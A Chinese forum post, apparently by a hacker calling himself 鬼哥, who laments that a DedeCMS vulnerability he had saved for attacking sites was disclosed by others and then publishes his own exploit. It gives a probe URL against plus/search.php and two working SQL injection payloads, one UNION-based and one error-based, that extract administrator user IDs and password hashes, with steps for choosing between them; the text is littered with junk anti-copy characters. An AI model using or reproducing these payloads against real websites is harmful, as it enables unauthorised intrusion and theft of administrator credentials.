转载不加作者名的没JJ4 |; y( Q+ J: F9 T% z6 x4 ]& R5 ^ N
$ ]" h3 T2 E, ~/ n哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
7 u" g6 r$ ]1 J! g& }& k% u
) I; i% n0 a: B1 P既然已经发出来了,我就把我自己搞的exp发下吧。。唉。, ]9 ~: Z; i, O
: `, K/ Q6 l1 E( J; e我一般是这样测试的:
, z0 W( `% C" Q
7 z# z4 E) r7 ~# Y提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
! M( y% S3 Q+ H- ^4 D4 L
1 z/ d: U6 i/ m4 N, `& g转载不加作者名的没JJ- h" L2 }! p) ~5 N3 d) y
; E {4 @. w5 G" T5 T& p( t- _
作者:鬼哥# T. `- x$ c- i2 y- N8 p$ X
9 d: @0 }7 f& P+ r3 i7 a9 Z) N ; x$ H/ ~; U( b2 I b/ n
" y2 M+ h& ^/ C5 M9 B
看结果如果提示9 U( P. K" c! x0 ~
; V" \& J2 p: k+ f8 v, _( }. \+ {
Safe Alert: Request Error step 2 !! A {4 r6 G: ]2 b Y1 N2 M
) a# Z$ Q7 j9 f# N
那么直接用下面的exp
* W/ `* l! p3 d- E) K g& p0 T9 Q7 M4 N: Y2 `2 U( i( I
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
% q0 L9 j* l X) c+ F* U1 S
" @, R: h/ S8 B) X# c6 I
& Y0 x7 t {) l6 z q- t看结果如果提示
! V% l8 ~! l2 _+ P; t' l8 l s9 V
Safe Alert: Request Error step 1 !
' F$ F# u& _- \3 y9 i
# ~7 ]7 q3 R4 |4 M: x* H1 q那么直接用下面的exp# c- ?2 x2 t" R4 f- D
8 S6 |2 f3 `8 o3 T
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
* g2 {: K* L( [) X0 M- J9 t3 a% ?. A0 r" [- ?1 k/ A. S
7 c; q' q1 p! M: X7 n/ e
如果正常显示证明漏洞不存在了。' f" D: M/ z. T" c. M. G2 ]0 o
3 A$ b; U" ~: I& Z, r, v# I
转载不加作者名的没JJ |